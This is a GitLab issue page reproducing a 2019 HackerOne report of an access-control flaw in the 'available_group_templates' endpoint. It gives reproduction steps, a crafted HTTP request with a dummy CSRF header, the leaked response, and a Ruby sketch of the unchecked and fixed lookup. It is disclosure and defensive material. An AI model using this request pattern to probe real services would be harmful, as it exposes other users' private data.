GitLab.org / GitLab / Issues / #26103 (Closed)

Issue created Jan 11, 2019 by GitLab SecurityBot (@gitlab-securitybot), Reporter

Disclosure of Any User's Private Group Info by `available_group_templates`

HackerOne report #475240 by ngalog on 2019-01-06, assigned to asaba:

Summary: Lately GitLab allows users to create projects from group templates; the newly introduced endpoint didn't perform an access control check, allowing an unauthorized user to access the private group info of other users.

Steps To Reproduce:

  • Log in to gitlab.com
  • Visit https://gitlab.com/users/ashleyjohnson/available_group_templates
  • In Burp, send the request to Repeater
  • Add this line to the headers:
X-CSRF-Token: testing

The full request should look like:

GET /users/ashleyjohnson/available_group_templates HTTP/1.1
Host: gitlab.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-Token: testing
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: xxx
Upgrade-Insecure-Requests: 1

Then my private group new-jjj-groupaaa is leaked, and all of the project names/namespaces (gitlab-ce) are leaked too.

Leaked info:

var target = $(".project-templates-buttons#custom-group-project-templates");
target.empty();
target.html("<div class=\"custom-project-templates\">\n<div class=\"border-top-0 expanded js-template-group-options template-group-options\">\n<div class=\"template-header d-flex align-items-center\">\n<div class=\"template-subgroup d-flex flex-fill align-items-center\">\n<div class=\"template-options-icon-container d-flex justify-content-center align-items-center append-right-10\">\n<svg class=\"s16 options-expanded-icon\"><use xlink:href=\"https://gitlab.com/assets/icons-1bbf3f0e2e8f631ea6006c647f843db214684476054223102c16630dabc450d4.svg#angle-down\"><\/use><\/svg>\n<svg class=\"s16 options-collapsed-icon\"><use xlink:href=\"https://gitlab.com/assets/icons-1bbf3f0e2e8f631ea6006c647f843db214684476054223102c16630dabc450d4.svg#angle-right\"><\/use><\/svg>\n<\/div>\n<div class=\"avatar-container s40\">\n<div class=\"btn-template-icon avatar s40 avatar-tile identicon bg4\">N<\/div>\n<\/div>\n<div class=\"template-subgroup-name prepend-left-5\">\n<strong>newsub<\/strong>\n<\/div>\n<\/div>\n<div class=\"template-subgroup-project-count\">\n<span class=\"badge badge-pill\">\n<strong>\n2\n<\/strong>\n<\/span>\n<\/div>\n<\/div>\n<div class=\"template-option align-items-center\">\n<div class=\"avatar-container s40\">\n<img alt=\"tempalte\" class=\"btn-template-icon avatar s40 avatar-tile\" src=\"https://gitlab.com/uploads/-/system/project/avatar/10227470/logo-extra-whitespace.png\" />\n<\/div>\n<div class=\"description prepend-left-5\">\n<strong>\ntempalte\n<\/strong>\n<br>\n<div class=\"text-muted\">\nteamplte\n<\/div>\n<\/div>\n<div class=\"controls d-flex align-items-baseline\">\n<a class=\"btn btn-default append-right-10\" href=\"/new-jjj-groupaaa/newsub/tempalte\" rel=\"noopener noreferrer\" target=\"_blank\">\nPreview\n<\/a>\n<label class=\"btn btn-success custom-template-button choose-template append-bottom-0\" for=\"tempalte\">\n<input autocomplete=\"off\" data-subgroup-id=\"4324729\" id=\"tempalte\" name=\"project[template_name]\" type=\"radio\" 
value=\"tempalte\">\n<span>\nUse template\n<\/span>\n<\/label>\n<\/div>\n<\/div>\n<div class=\"template-option align-items-center\">\n<div class=\"avatar-container s40\">\n<img alt=\"GitLab Community Edition\" class=\"btn-template-icon avatar s40 avatar-tile\" src=\"https://gitlab.com/uploads/-/system/project/avatar/10181735/logo-extra-whitespace.png\" />\n<\/div>\n<div class=\"description prepend-left-5\">\n<strong>\nGitLab Community Edition\n<\/strong>\n<br>\n<div class=\"text-muted\">\nGitLab Community Edition (CE) is an open source end-to-end software development platform with built-in version control, issue tracking, code review, CI/CD, and more. Self-host GitLab CE on your own servers, in a container, or on a cloud provider.\n<\/div>\n<\/div>\n<div class=\"controls d-flex align-items-baseline\">\n<a class=\"btn btn-default append-right-10\" href=\"/new-jjj-groupaaa/newsub/gitlab-ce\" rel=\"noopener noreferrer\" target=\"_blank\">\nPreview\n<\/a>\n<label class=\"btn btn-success custom-template-button choose-template append-bottom-0\" for=\"GitLab Community Edition\">\n<input autocomplete=\"off\" data-subgroup-id=\"4324729\" id=\"GitLab Community Edition\" name=\"project[template_name]\" type=\"radio\" value=\"GitLab Community Edition\">\n<span>\nUse template\n<\/span>\n<\/label>\n<\/div>\n<\/div>\n<\/div>\n\n<\/div>\n");
target.trigger("ajax:success");

Impact

Leaks this info to any unauthorised user.

Screen_Shot_2019-01-06_at_10.35.55_PM.png

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • Screen_Shot_2019-01-06_at_10.35.55_PM.png
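The defect in the report is a user-scoped endpoint that trusts the username in the URL path and never asks who is making the request. The following Ruby model is an added illustration, not GitLab's own code: it shows the unchecked lookup beside a version that filters the listed groups by what the requester is actually allowed to read. The group, member and template names are constructed sample data.

```ruby
# Added illustration (not GitLab's code). Groups carry a visibility level and a
# member list, mirroring the two facts an authorization check needs.
Group = Struct.new(:name, :visibility, :members, :templates)

# Constructed sample data: a private group with two project templates and a
# public group, both owned by the constructed user "ashley".
GROUPS = [
  Group.new("new-jjj-groupaaa", :private, ["ashley"], ["tempalte", "gitlab-ce"]),
  Group.new("public-templates", :public,  ["ashley"], ["starter"]),
].freeze

def groups_of(user)
  GROUPS.select { |g| g.members.include?(user) }
end

# Vulnerable shape of the endpoint: the path says whose templates to list and
# the handler returns them to anyone, including that user's private groups.
def available_group_templates_unchecked(path_user)
  groups_of(path_user).map { |g| [g.name, g.templates] }.to_h
end

# A requester may read a group only if it is public or they are a member.
def can_read_group?(requester, group)
  group.visibility == :public || group.members.include?(requester)
end

# Hardened shape: every group is filtered through the requester's own
# permissions, so a stranger asking about another user's templates only
# ever sees groups they could already read. (Requiring requester == path_user
# is the simpler alternative when the endpoint is meant for self-service only.)
def available_group_templates(requester, path_user)
  groups_of(path_user)
    .select { |g| can_read_group?(requester, g) }
    .map { |g| [g.name, g.templates] }
    .to_h
end

if __FILE__ == $PROGRAM_NAME
  puts "unchecked, requested by a stranger: #{available_group_templates_unchecked('ashley')}"
  puts "checked, requested by a stranger:   #{available_group_templates('stranger', 'ashley')}"
  puts "checked, requested by the owner:    #{available_group_templates('ashley', 'ashley')}"
end
```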